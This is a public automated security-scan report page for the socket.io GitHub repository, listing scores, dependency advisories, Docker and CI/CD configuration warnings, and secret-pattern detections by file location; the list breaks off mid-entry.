Public scan — anyone with this URL can view this analysis. Sign up to track your own repos privately, run scheduled re-scans, and get AI fix prompts via your dashboard.
Sign up free Scan another repo
64 of your 548 findings came from Repobility's proprietary detections. ✓ Repobility tags below mark them.

Scan timing: clone 4.16s · analysis 86.46s · 17.3 MB · GitHub API rate-limit (preflight)

socketio/socket.io

https://github.com/socketio/socket.io · scanned 2026-06-05 09:06 UTC (5 days, 18 hours ago) · 10 languages

832 raw signals (382 security + 450 graph) 48th percentile · Javascript · medium (20-100K LoC) System graph score 48 (higher by 17)

File as issue Image
UNIFIED Repobility · multi-layer engine · AI coders

Complete repo analysis

Last scanned 5 days, 18 hours ago · v2 · 400 actionable findings from 2 signal sources. 207 repeated signals grouped for readability. Security checks, system graph analysis, and verified AI-agent feedback are merged into one review queue.

JSON
Combined
48.9
/100
Security checks
50
207 findings
System graph
48
100.0% cov · 193 findings
Critical
15
click to filter
Agents
6
0 votes
Crowd
0
reported
Score breakdown â 2026-05-18-v5
Component Sub-score Weight Contribution
structure_score 60.0 0.15 9.00
security_score 25.1 0.25 6.28
testing_score 92.0 0.20 18.40
documentation_score 86.6 0.15 12.99
practices_score 74.0 0.15 11.10
code_quality 71.0 0.10 7.10
Overall 1.00 64.9
Severity distribution — click a segment to filter
Active filters: excluding tests × Reset all
Severity: Critical 15 High 84 Medium 93 Low 171 9-Layer: Software Security Quality Integrity Frontend Hardware Data Network Cicd Source: Security checks 207 System graph 193 Crowd 0 Layer: Quality 40 Security 10 Software 219 Cicd 18 Frontend 94 Hardware 7 Api 12
Scan summary Quality grade C+ (65/100). Dimensions: security 25, maintainability 60. 382 findings (223 security). 54,740 lines analyzed.

Showing 353 of 400 actionable findings. 607 raw detector signals were grouped into reader-sized issues. Click TP / FP to vote on a finding's accuracy — votes adjust the confidence weighting and improve detection across the platform.

critical Security checks software dependencies conf 0.88 @babel/traverse: GHSA-67hx-6x53-jw92
Babel vulnerable to arbitrary code execution when compiling specifically crafted malicious code
examples/create-react-app-example/yarn.lock
critical Security checks software dependencies conf 0.88 basic-ftp: GHSA-5rq4-664w-9x2c
Basic FTP has Path Traversal Vulnerability in its downloadToDir() method
package-lock.json
critical Security checks cicd CI/CD security conf 0.96 Compose service contains a literal secret environment value
Literal secrets in Compose files are committed to source and exposed through container inspection.
packages/socket.io-postgres-emitter/compose.yaml:1 CI/CD securitycontainers
critical Security checks cicd CI/CD security conf 0.98 Compose service mounts the Docker socket
The Docker socket gives the container control over the Docker host and is commonly equivalent to host root access.
examples/cluster-traefik/docker-compose.yml:3 CI/CD securitycontainers
critical Security checks security secrets conf 0.95 3 occurrences Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
Gitleaks detected a committed secret or credential pattern.
2 files, 3 locations
packages/engine.io/test/server.js:182, 204 (2 hits)
examples/nestjs-example/README.md:5
critical Security checks software dependencies conf 0.88 fast-xml-parser: GHSA-m7jm-9gc2-mpf2
fast-xml-parser has an entity encoding bypass via regex injection in DOCTYPE entity names
examples/ReactNativeExample/yarn.lock
critical Security checks software dependencies conf 0.88 form-data: GHSA-fjxv-7rqg-78g4
form-data uses unsafe random function in form-data for choosing boundary
examples/create-react-app-example/yarn.lock
critical Security checks software dependencies conf 0.88 minimist: GHSA-xvch-5gv4-984h
Prototype Pollution in minimist
packages/engine.io/examples/latency/package-lock.json
critical Security checks software dependencies conf 0.88 shell-quote: GHSA-qg8p-v9q4-gh34
Potential Command Injection in shell-quote
packages/engine.io/examples/latency/package-lock.json
critical Security checks software dependencies conf 0.88 uglify-js: GHSA-34r7-q49f-h37c
Incorrect Handling of Non-Boolean Comparisons During Minification in uglify-js
packages/engine.io/examples/latency/package-lock.json
critical Security checks software dependencies conf 0.88 webpack: GHSA-hc6q-2mpp-qw7j
Cross-realm object access in Webpack 5
examples/create-react-app-example/yarn.lock
low Security checks cicd CI/CD security conf 0.35 ✓ Repobility 8 occurrences Workflow references repository secrets in a pull_request workflow
Fork pull_request runs do not receive normal repository secrets on GitHub Actions. Review this as a reliability/intent signal, not as direct fork-secret exfiltration. Raise severity only for pull_request_target or another trusted-context path that runs untrusted PR code with secrets.
4 files, 8 locations
.github/workflows/ci-engine.io-client.yml:70, 71 (2 hits)
.github/workflows/ci-engine.io-parser.yml:48, 49 (2 hits)
.github/workflows/ci-socket.io-client.yml:75, 76 (2 hits)
.github/workflows/ci-socket.io-parser.yml:49, 50 (2 hits)
CI/CD securityworkflow secretsGitHub Actions
critical System graph security Secrets conf 1.00 Possible secret in packages/socket.io-postgres-emitter/compose.yaml
Detected pattern matching password_literal. Rotate the credential and move to a secret manager.
packages/socket.io-postgres-emitter/compose.yaml:7
high Security checks software dependencies conf 0.88 2 occurrences @babel/plugin-transform-modules-systemjs: GHSA-fv7c-fp4j-7gwp
@babel/plugin-transform-modules-systemjs generates arbitrary code when compiling malicious input
2 files, 2 locations
examples/ReactNativeExample/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-35jp-ww65-95wh
axios Vulnerable to Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-3g43-6gmg-66jw
axios Vulnerable to Credential Theft and Response Hijacking via Prototype Pollution Gadget in Config Merge
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-43fc-jf86-j433
Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-6chq-wfr3-2hj9
Axios: Header Injection via Prototype Pollution
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-777c-7fjr-54vf
Allocation of Resources Without Limits or Throttling in Axios
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-hfxv-24rg-xrqf
Axios: Regular Expression Denial of Service (ReDoS) via Cookie Name Injection
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-j5f8-grm9-p9fc
Axios: Proxy-Authorization header leaks to redirect target when proxy is re-evaluated to direct connection
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-p92q-9vqr-4j8v
Axios: Proxy-Authorization Credential Leak to Origin Server Across HTTP-to-HTTPS Redirect in Axios Node.js HTTP Adapter
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-pf86-5x62-jrwf
Axios: Prototype Pollution Gadgets - Response Tampering, Data Exfiltration, and Request Hijacking
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-pjwm-pj3p-43mv
axios's shouldBypassProxy does not recognize IPv4-mapped IPv6 addresses, allowing NO_PROXY bypass (incomplete fix for CVE-2025-62718)
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-q8qp-cvcw-x6jj
Axios has prototype pollution read-side gadgets in HTTP adapter that allow credential injection and request hijacking
package-lock.json
high Security checks software dependencies conf 0.88 basic-ftp: GHSA-6v7q-wjvx-w8wg
basic-ftp: Incomplete CRLF Injection Protection Allows Arbitrary FTP Command Execution via Credentials and MKD Commands
package-lock.json
high Security checks software dependencies conf 0.88 basic-ftp: GHSA-rp42-5vxx-qpwr
basic-ftp vulnerable to denial of service via unbounded memory consumption in Client.list()
package-lock.json
high Security checks software dependencies conf 0.88 basic-ftp: GHSA-rpmf-866q-6p89
basic-ftp allows a malicious FTP server to cause client-side denial of service via unbounded multiline control response buffering
package-lock.json
high Security checks software dependencies conf 0.90 ✓ Repobility Binary file `examples/ReactNativeExample/android/gradle/wrapper/gradle-wrapper.jar` committed in source repo
`examples/ReactNativeExample/android/gradle/wrapper/gradle-wrapper.jar` is a .jar binary (63,721 bytes) committed to a repo that otherwise has 288 source files. Trojan binaries inside otherwise-normal source repos are a known supply-chain attack: a compromised dependency or PR slips in a binary tha…
examples/ReactNativeExample/android/gradle/wrapper/gradle-wrapper.jar:1
high Security checks software dependencies conf 0.88 body-parser: GHSA-qwcr-r2fm-qrc7
body-parser vulnerable to denial of service when url encoding is enabled
examples/basic-crud-application/vue-client/yarn.lock
high Security checks software dependencies conf 0.88 compressing: GHSA-4c3q-x735-j3r5
Complete Bypass of CVE-2026-24884 Patch via Git-Delivered Symlink Poisoning in compressing
package-lock.json
high Security checks software dependencies conf 0.88 cross-spawn: GHSA-3xgq-45jj-v275
Regular Expression Denial of Service (ReDoS) in cross-spawn
examples/ReactNativeExample/yarn.lock
high Security checks cicd CI/CD security conf 0.90 3 occurrences Database service has no persistent data volume
Database containers store data in the writable container layer unless a volume or bind mount is attached to the image's data directory. Recreating the container can lose state.
3 files, 3 locations
examples/basic-crud-application/server-postgres-cluster/docker-compose.yml:3
examples/postgres-adapter-example/compose.yaml:1
packages/socket.io-postgres-emitter/compose.yaml:1
CI/CD securitycontainers
high Security checks cicd CI/CD security conf 0.84 8 occurrences Database service publishes a host port
Publishing database ports to the host increases exposure. Internal Compose networking usually only needs expose, not ports.
7 files, 8 locations
packages/socket.io-redis-streams-emitter/compose.yaml:1, 6 (2 hits)
examples/basic-crud-application/server-postgres-cluster/docker-compose.yml:3
examples/cluster-engine-redis/compose.yaml:1
examples/postgres-adapter-example/compose.yaml:1
examples/private-messaging/server/docker-compose.yml:3
packages/socket.io-cluster-engine/compose.yaml:1
packages/socket.io-postgres-emitter/compose.yaml:1
CI/CD securitycontainers
high Security checks software dependencies conf 0.88 debug: GHSA-9vvw-cc9w-f27h
debug Inefficient Regular Expression Complexity vulnerability
packages/engine.io/examples/latency/package-lock.json
high Security checks cicd CI/CD security conf 0.92 5 occurrences Dockerfile copies the entire context without .dockerignore
COPY . or ADD . sends the full build context to Docker. Without .dockerignore this can include secrets, git history, and local artifacts.
5 files, 5 locations
examples/cluster-haproxy/server/Dockerfile:12
examples/cluster-httpd/server/Dockerfile:12
examples/cluster-nginx/client/Dockerfile:12
examples/cluster-nginx/server/Dockerfile:12
examples/cluster-traefik/server/Dockerfile:12
CI/CD securitycontainers
high Security checks software dependencies conf 0.90 ✓ Repobility 7 occurrences Dockerfile FROM `node:14-alpine` not pinned by digest
`FROM node:14-alpine` resolves the tag at build time. The registry CAN re-push a different image for the same tag, so every build is potentially different. Production images should pin to `image@sha256:...` for reproducibility + supply-chain integrity.
7 files, 7 locations
examples/cluster-haproxy/server/Dockerfile:1
examples/cluster-httpd/server/Dockerfile:1
examples/cluster-nginx/client/Dockerfile:1
examples/cluster-nginx/server/Dockerfile:1
examples/cluster-traefik/server/Dockerfile:1
examples/connection-state-recovery-example/cjs/.codesandbox/Dockerfile:1
examples/connection-state-recovery-example/esm/.codesandbox/Dockerfile:1
high Security checks quality Quality conf 0.80 ✓ Repobility 3 occurrences Express POST /incr has no auth
Express route POST /incr declared without an auth middleware in its handler chain. Destructive methods (POST/PUT/DELETE/PATCH) on unauthenticated routes are OWASP A01:2021 broken access control.
3 files, 3 locations
examples/express-session-example/cjs/index.js:24
examples/express-session-example/esm/index.js:23
examples/express-session-example/ts/index.ts:30
high Security checks quality Quality conf 0.80 ✓ Repobility 3 occurrences Express POST /login has no auth
Express route POST /login declared without an auth middleware in its handler chain. Destructive methods (POST/PUT/DELETE/PATCH) on unauthenticated routes are OWASP A01:2021 broken access control.
3 files, 3 locations
examples/passport-jwt-example/cjs/index.js:36
examples/passport-jwt-example/esm/index.js:37
examples/passport-jwt-example/ts/index.ts:47
high Security checks quality Quality conf 0.80 ✓ Repobility 3 occurrences Express POST /logout has no auth
Express route POST /logout declared without an auth middleware in its handler chain. Destructive methods (POST/PUT/DELETE/PATCH) on unauthenticated routes are OWASP A01:2021 broken access control.
3 files, 3 locations
examples/express-session-example/cjs/index.js:32
examples/express-session-example/esm/index.js:31
examples/express-session-example/ts/index.ts:38
high Security checks software dependencies conf 0.88 fast-xml-parser: GHSA-8gc5-j5rx-235r
fast-xml-parser affected by numeric entity expansion bypassing all entity expansion limits (incomplete fix for CVE-2026-26278)
examples/ReactNativeExample/yarn.lock
high Security checks software dependencies conf 0.88 fast-xml-parser: GHSA-mpg4-rc92-vx8v
fast-xml-parser vulnerable to ReDOS at currency parsing
examples/ReactNativeExample/yarn.lock
high Security checks software dependencies conf 0.88 flatted: GHSA-25h7-pfq9-p65f
flatted vulnerable to unbounded recursion DoS in parse() revive phase
examples/ReactNativeExample/yarn.lock
high Security checks software dependencies conf 0.88 flatted: GHSA-rf6f-7fwh-wjgh
Prototype Pollution via parse() in NodeJS flatted
examples/ReactNativeExample/yarn.lock
low Security checks cicd CI/CD security conf 0.90 ✓ Repobility 53 occurrences GitHub Action is tag-pinned rather than SHA-pinned
Action `actions/checkout` pinned to mutable ref `@v6` uses a mutable tag or branch. Pin external actions to a reviewed full commit SHA when the workflow is security-sensitive.
12 files, 48 locations
.github/workflows/build-examples.yml:34, 37 (4 hits)
.github/workflows/ci-engine.io-client.yml:31, 34 (4 hits)
.github/workflows/ci-engine.io-parser.yml:25, 28 (4 hits)
.github/workflows/ci-engine.io.yml:31, 34 (4 hits)
.github/workflows/ci-socket.io-adapter.yml:38, 41 (4 hits)
.github/workflows/ci-socket.io-client.yml:39, 42 (4 hits)
.github/workflows/ci-socket.io-cluster-adapter.yml:41, 44 (4 hits)
.github/workflows/ci-socket.io-cluster-engine.yml:52, 55 (4 hits)
CI/CD securitySupply chainGitHub Actions
high Security checks software dependencies conf 0.88 glob: GHSA-5j98-mcp5-4vw2
glob CLI: Command injection via -c/--cmd executes matches with shell:true
package-lock.json
high Security checks software dependencies conf 0.88 http-proxy-middleware: GHSA-c7qv-q95q-8v27
Denial of service in http-proxy-middleware
examples/basic-crud-application/vue-client/yarn.lock
high Security checks software dependencies conf 0.88 image-size: GHSA-m5qc-5hw7-8vg7
image-size Denial of Service via Infinite Loop during Image Processing
examples/ReactNativeExample/yarn.lock
high Security checks software dependencies conf 0.88 launch-editor: GHSA-c27g-q93r-2cwf
launch-editor vulnerable to command injection via the crafted request on Windows
examples/basic-crud-application/vue-client/yarn.lock
high Security checks software dependencies conf 0.88 2 occurrences lodash: GHSA-r5fr-rjxr-66jc
lodash vulnerable to Code Injection via `_.template` imports key names
2 files, 2 locations
examples/ReactNativeExample/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 mime: GHSA-wrvr-8mpx-r7pp
mime Regular Expression Denial of Service when MIME lookup performed on untrusted user input
packages/engine.io/examples/latency/package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences minimatch: GHSA-23c5-xmqv-rm74
minimatch ReDoS: nested *() extglobs generate catastrophically backtracking regular expressions
2 files, 2 locations
docs/engine.io-protocol/v3-test-suite/package-lock.json
package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences minimatch: GHSA-3ppc-4f35-3m26
minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern
2 files, 2 locations
docs/engine.io-protocol/v3-test-suite/package-lock.json
package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences minimatch: GHSA-7r86-cg39-jmmj
minimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments
2 files, 2 locations
docs/engine.io-protocol/v3-test-suite/package-lock.json
package-lock.json
high Security checks software dependencies conf 0.88 minimatch: GHSA-hxm2-r34f-qmc5
Regular Expression Denial of Service in minimatch
packages/engine.io/examples/latency/package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences node-forge: GHSA-2328-f5f3-gj25
Forge has a basicConstraints bypass in its certificate chain verification (RFC 5280 violation)
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences node-forge: GHSA-554w-wpv2-vw27
node-forge has ASN.1 Unbounded Recursion
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences node-forge: GHSA-5gfm-wpxj-wjgq
node-forge has an Interpretation Conflict vulnerability via its ASN.1 Validator Desynchronization
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences node-forge: GHSA-5m6q-g25r-mvwx
Forge has Denial of Service via Infinite Loop in BigInteger.modInverse() with Zero Input
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences node-forge: GHSA-ppp5-5v6c-4jwp
Forge has signature forgery in RSA-PKCS due to ASN.1 extra field
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences node-forge: GHSA-q67f-28xg-22rw
Forge has signature forgery in Ed25519 due to missing S > L check
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 nth-check: GHSA-rp65-9cf3-cjxr
Inefficient Regular Expression Complexity in nth-check
examples/create-react-app-example/yarn.lock
high Security checks software dependencies conf 0.90 ✓ Repobility package.json dep `uWebSockets.js` pulled from URL/Git
`devDependencies.uWebSockets.js` = `github:uNetworking/uWebSockets.js#v20.56.0` bypasses the npm registry. No integrity hash, no version locking, no registry-side scanning. If the URL or git host is compromised, every `npm install` pulls the new payload.
package.json:1
high Security checks software dependencies conf 0.88 2 occurrences path-to-regexp: GHSA-37ch-88jc-xwx2
path-to-regexp vulnerable to Regular Expression Denial of Service via multiple route parameters
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 path-to-regexp: GHSA-9wv6-86v2-598j
path-to-regexp outputs backtracking regular expressions
examples/basic-crud-application/vue-client/yarn.lock
high Security checks software dependencies conf 0.88 path-to-regexp: GHSA-rhx6-c78j-4q9w
path-to-regexp contains a ReDoS
examples/basic-crud-application/vue-client/yarn.lock
high Security checks software dependencies conf 0.88 2 occurrences picomatch: GHSA-c2c7-rcm5-vvqj
Picomatch has a ReDoS vulnerability via extglob quantifiers
2 files, 2 locations
docs/engine.io-protocol/v3-test-suite/package-lock.json
package-lock.json
high Security checks software dependencies conf 0.88 rollup: GHSA-gcx4-mw62-g8wm
DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS
examples/create-react-app-example/yarn.lock
high Security checks software dependencies conf 0.88 2 occurrences rollup: GHSA-mw96-cpmx-2vgc
Rollup 4 has Arbitrary File Write via Path Traversal
2 files, 2 locations
examples/create-react-app-example/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 semver: GHSA-c2qf-rxjj-qqgw
semver vulnerable to Regular Expression Denial of Service
examples/create-react-app-example/yarn.lock
high Security checks software dependencies conf 0.88 2 occurrences serialize-javascript: GHSA-5c6j-r48x-rmvq
Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()
2 files, 2 locations
docs/engine.io-protocol/v3-test-suite/package-lock.json
package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences socket.io-parser: GHSA-677m-j7p3-52f9
socket.io allows an unbounded number of binary attachments
2 files, 2 locations
examples/ReactNativeExample/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 svgo: GHSA-xpqw-6gx7-v673
SVGO DoS through entity expansion in DOCTYPE (Billion Laughs)
examples/basic-crud-application/vue-client/yarn.lock
high Security checks software dependencies conf 0.88 2 occurrences tar-fs: GHSA-8cj5-5rvv-wf4v
tar-fs can extract outside the specified dir with a specific tarball
2 files, 2 locations
package-lock.json
packages/engine.io/examples/memory-usage-webtransport/package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences tar-fs: GHSA-pq67-2wwv-3xjx
tar-fs Vulnerable to Link Following and Path Traversal via Extracting a Crafted tar File
2 files, 2 locations
package-lock.json
packages/engine.io/examples/memory-usage-webtransport/package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences tar-fs: GHSA-vj76-c3g6-qr5v
tar-fs has a symlink validation bypass if destination directory is predictable with a specific tarball
2 files, 2 locations
package-lock.json
packages/engine.io/examples/memory-usage-webtransport/package-lock.json
high Security checks software dependencies conf 0.88 tar: GHSA-34x7-hfp2-rc4v
node-tar Vulnerable to Arbitrary File Creation/Overwrite via Hardlink Path Traversal
package-lock.json
high Security checks software dependencies conf 0.88 tar: GHSA-83g3-92jg-28cx
Arbitrary File Read/Write via Hardlink Target Escape Through Symlink Chain in node-tar Extraction
package-lock.json
high Security checks software dependencies conf 0.88 tar: GHSA-8qq5-rm4j-mr97
node-tar is Vulnerable to Arbitrary File Overwrite and Symlink Poisoning via Insufficient Path Sanitization
package-lock.json
high Security checks software dependencies conf 0.88 tar: GHSA-9ppj-qmqm-q256
node-tar Symlink Path Traversal via Drive-Relative Linkpath
package-lock.json
high Security checks software dependencies conf 0.88 tar: GHSA-qffp-2rhf-9h96
tar has Hardlink Path Traversal via Drive-Relative Linkpath
package-lock.json
high Security checks software dependencies conf 0.88 tar: GHSA-r6q2-hw4h-h46w
Race Condition in node-tar Path Reservations via Unicode Ligature Collisions on macOS APFS
package-lock.json
high Security checks software dependencies conf 0.88 tmp: GHSA-ph9p-34f9-6g65
tmp has Path Traversal via unsanitized prefix/postfix that enables directory escape
package-lock.json
high Security checks software dependencies conf 0.88 uglify-js: GHSA-c9f4-xj24-8jqx
Regular Expression Denial of Service in uglify-js
packages/engine.io/examples/latency/package-lock.json
high Security checks software dependencies conf 0.88 webpack-dev-middleware: GHSA-wr3j-pwj9-hqq6
Path traversal in webpack-dev-middleware
examples/basic-crud-application/vue-client/yarn.lock
high Security checks software dependencies conf 0.90 ✓ Repobility 3 occurrences Workflow container/services image `redis:7` unpinned
`container/services image: redis:7` without `@sha256:...` pulls a mutable tag at workflow-run time. Treat workflow container references with the same supply-chain discipline as Dockerfile FROM lines.
3 files, 3 locations
.github/workflows/ci-socket.io-cluster-engine.yml:41
.github/workflows/ci-socket.io-postgres-emitter.yml:41
.github/workflows/ci-socket.io-redis-streams-emitter.yml:41
high Security checks software dependencies conf 0.88 ws: GHSA-3h5v-q93c-6h6q
ws affected by a DoS when handling a request with many HTTP headers
examples/ReactNativeExample/yarn.lock
high System graph api Wiring conf 1.00 Dangling fetch: GET http://localhost:${getPort(io)} (packages/socket.io/test/server-attachment.ts:197)
`packages/socket.io/test/server-attachment.ts:197` calls `GET http://localhost:${getPort(io)}` but no backend route matches that path. This is a runtime 404 waiting to happen. Tool: helper:request Normalized path used for matching: `/http:/localhost:/<p>` If this points at an external API, prefix …
Dangling fetchHelper:request
high System graph api Wiring conf 1.00 Dangling fetch: GET http://localhost:${getPort(io)} (packages/socket.io/test/server-attachment.ts:205)
`packages/socket.io/test/server-attachment.ts:205` calls `GET http://localhost:${getPort(io)}` but no backend route matches that path. This is a runtime 404 waiting to happen. Tool: helper:request Normalized path used for matching: `/http:/localhost:/<p>` If this points at an external API, prefix …
Dangling fetchHelper:request
high System graph api Wiring conf 1.00 Dangling fetch: GET http://localhost:${port} (packages/socket.io/test/uws.ts:234)
`packages/socket.io/test/uws.ts:234` calls `GET http://localhost:${port}` but no backend route matches that path. This is a runtime 404 waiting to happen. Tool: helper:request Normalized path used for matching: `/http:/localhost:/<p>` If this points at an external API, prefix it with `https://` so…
Dangling fetchHelper:request
high System graph api Wiring conf 1.00 Dangling fetch: POST http://localhost:${port}/engine.io/?EIO=4&transport=polling&sid=${sid} (packages/engine.io/test/server.js:1471)
`packages/engine.io/test/server.js:1471` calls `POST http://localhost:${port}/engine.io/?EIO=4&transport=polling&sid=${sid}` but no backend route matches that path. This is a runtime 404 waiting to happen. Tool: fetch Normalized path used for matching: `/http:/localhost:/<p>/engine.io` If this poi…
Dangling fetchFetch
medium Security checks software dependencies conf 0.88 @adobe/css-tools: GHSA-hpx4-r86g-5jrg
@adobe/css-tools Regular Expression Denial of Service (ReDOS) while Parsing CSS
examples/create-react-app-example/yarn.lock
medium Security checks software dependencies conf 0.88 @adobe/css-tools: GHSA-prr3-c3m5-p7q2
@adobe/css-tools Improper Input Validation and Inefficient Regular Expression Complexity
examples/create-react-app-example/yarn.lock
medium Security checks software dependencies conf 0.88 @babel/helpers: GHSA-968p-4wvh-cqc8
Babel has inefficient RegExp complexity in generated code with .replace when transpiling named capturing groups
examples/ReactNativeExample/yarn.lock
medium Security checks software dependencies conf 0.88 @babel/runtime: GHSA-968p-4wvh-cqc8
Babel has inefficient RegExp complexity in generated code with .replace when transpiling named capturing groups
examples/ReactNativeExample/yarn.lock
medium Security checks security auth conf 0.92 [AUC001] No Repobility access matrix policy found: The repository uses web/API frameworks but does not define .repobility/access.yml or equivalent authorization documentation.
The repository uses web/API frameworks but does not define .repobility/access.yml or equivalent authorization documentation.
high Security checks security auth conf 0.74 [AUC002] Low visible authorization coverage in route inventory: Only 0.0% of discovered routes show nearby authentication, authorization, middleware, or public-route evidence.
Only 0.0% of discovered routes show nearby authentication, authorization, middleware, or public-route evidence.
medium Security checks software dependencies conf 0.88 2 occurrences ajv: GHSA-2g4f-4pwh-qvx6
ajv has ReDoS when using `$data` option
2 files, 2 locations
examples/ReactNativeExample/yarn.lock
package-lock.json
medium Security checks software dependencies conf 0.88 axios: GHSA-3w6x-2g7m-8v23
Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget in `parseReviver`
package-lock.json
medium Security checks software dependencies conf 0.88 axios: GHSA-445q-vr5w-6q77
Axios: CRLF Injection in multipart/form-data body via unsanitized blob.type in formDataToStream
package-lock.json
medium Security checks software dependencies conf 0.88 axios: GHSA-5c9x-8gcm-mpgx
Axios' HTTP adapter-streamed uploads bypass maxBodyLength when maxRedirects: 0
package-lock.json
medium Security checks software dependencies conf 0.88 axios: GHSA-62hf-57xw-28j9
Axios: unbounded recursion in toFormData causes DoS via deeply nested request data
package-lock.json
medium Security checks software dependencies conf 0.88 axios: GHSA-898c-q2cr-xwhg
axios has DoS & Header Injection via Prototype Pollution Read-Side Gadgets in axios merge functions
package-lock.json
medium Security checks software dependencies conf 0.88 axios: GHSA-fvcv-3m26-pcqx
Axios has Unrestricted Cloud Metadata Exfiltration via Header Injection Chain
package-lock.json
medium Security checks software dependencies conf 0.88 axios: GHSA-m7pr-hjqh-92cm
Axios: no_proxy bypass via IP alias allows SSRF
package-lock.json
medium Security checks software dependencies conf 0.88 axios: GHSA-vf2m-468p-8v99
Axios: HTTP adapter streamed responses bypass maxContentLength
package-lock.json
medium Security checks software dependencies conf 0.88 axios: GHSA-w9j2-pvgh-6h63
Axios: Authentication Bypass via Prototype Pollution Gadget in `validateStatus` Merge Strategy
package-lock.json
medium Security checks software dependencies conf 0.88 axios: GHSA-xx6v-rp6x-q39c
Axios: XSRF Token Cross-Origin Leakage via Prototype Pollution Gadget in `withXSRFToken` Boolean Coercion
package-lock.json
medium Security checks software dependencies conf 0.88 2 occurrences brace-expansion: GHSA-f886-m6hf-6m8v
brace-expansion: Zero-step sequence causes process hang and memory exhaustion
2 files, 2 locations
docs/engine.io-protocol/v3-test-suite/package-lock.json
package-lock.json
medium Security checks cicd CI/CD security conf 0.56 Compose service contains a literal secret environment value
Literal secrets in Compose files are committed to source and exposed through container inspection.
examples/postgres-adapter-example/compose.yaml:1 CI/CD securitycontainers
medium Security checks cicd CI/CD security conf 0.56 Compose service contains a literal secret environment value
Literal secrets in Compose files are committed to source and exposed through container inspection.
examples/basic-crud-application/server-postgres-cluster/docker-compose.yml:3 CI/CD securitycontainers
medium Security checks cicd CI/CD security conf 0.88 3 occurrences Database service has no healthcheck
Compose starts dependent containers in dependency order, but it does not wait for a database to be ready unless a healthcheck is defined and dependents use service_healthy.
3 files, 3 locations
examples/basic-crud-application/server-postgres-cluster/docker-compose.yml:3
examples/postgres-adapter-example/compose.yaml:1
packages/socket.io-postgres-emitter/compose.yaml:1
CI/CD securitycontainers
medium Security checks cicd CI/CD security conf 0.74 9 occurrences Database service has no persistent data volume
Database containers store data in the writable container layer unless a volume or bind mount is attached to the image's data directory. Recreating the container can lose state.
8 files, 9 locations
packages/socket.io-redis-streams-emitter/compose.yaml:1, 6 (2 hits)
examples/cluster-engine-redis/compose.yaml:1
examples/cluster-haproxy/docker-compose.yml:49
examples/cluster-httpd/docker-compose.yml:49
examples/cluster-nginx/docker-compose.yml:54
examples/cluster-traefik/docker-compose.yml:23
examples/private-messaging/server/docker-compose.yml:3
packages/socket.io-cluster-engine/compose.yaml:1
CI/CD securitycontainers
medium Security checks cicd CI/CD security conf 0.90 Docker build context has no .dockerignore
Without .dockerignore, build context can include source history, local env files, dependencies, and generated artifacts.
.dockerignore CI/CD securitycontainers
high Security checks cicd CI/CD security conf 0.82 7 occurrences Docker final stage has no non-root USER
Docker images run as root unless the image or Dockerfile switches to a non-root user.
7 files, 7 locations
examples/cluster-haproxy/server/Dockerfile:1
examples/cluster-httpd/server/Dockerfile:1
examples/cluster-nginx/client/Dockerfile:1
examples/cluster-nginx/server/Dockerfile:1
examples/cluster-traefik/server/Dockerfile:1
examples/connection-state-recovery-example/cjs/.codesandbox/Dockerfile:1
examples/connection-state-recovery-example/esm/.codesandbox/Dockerfile:1
CI/CD securitycontainers
medium Security checks software dependencies conf 0.88 ejs: GHSA-ghr5-ch3p-vcr6
ejs lacks certain pollution protection
examples/create-react-app-example/yarn.lock
medium Security checks software dependencies conf 0.88 engine.io: GHSA-q9mw-68c2-j6m5
engine.io Uncaught Exception vulnerability
examples/create-react-app-example/yarn.lock
medium Security checks software dependencies conf 0.88 express: GHSA-rv95-896h-c2vc
Express.js Open Redirect in malformed URLs
examples/basic-crud-application/vue-client/yarn.lock
medium Security checks software dependencies conf 0.88 fast-xml-parser: GHSA-gh4j-gqv2-49f6
fast-xml-parser XMLBuilder: XML Comment and CDATA Injection via Unescaped Delimiters
examples/ReactNativeExample/yarn.lock
medium Security checks software dependencies conf 0.88 fast-xml-parser: GHSA-jp2q-39xq-3w4g
Entity Expansion Limits Bypassed When Set to Zero Due to JavaScript Falsy Evaluation in fast-xml-parser
examples/ReactNativeExample/yarn.lock
medium Security checks software dependencies conf 0.88 follow-redirects: GHSA-cxjh-pqwp-8mfp
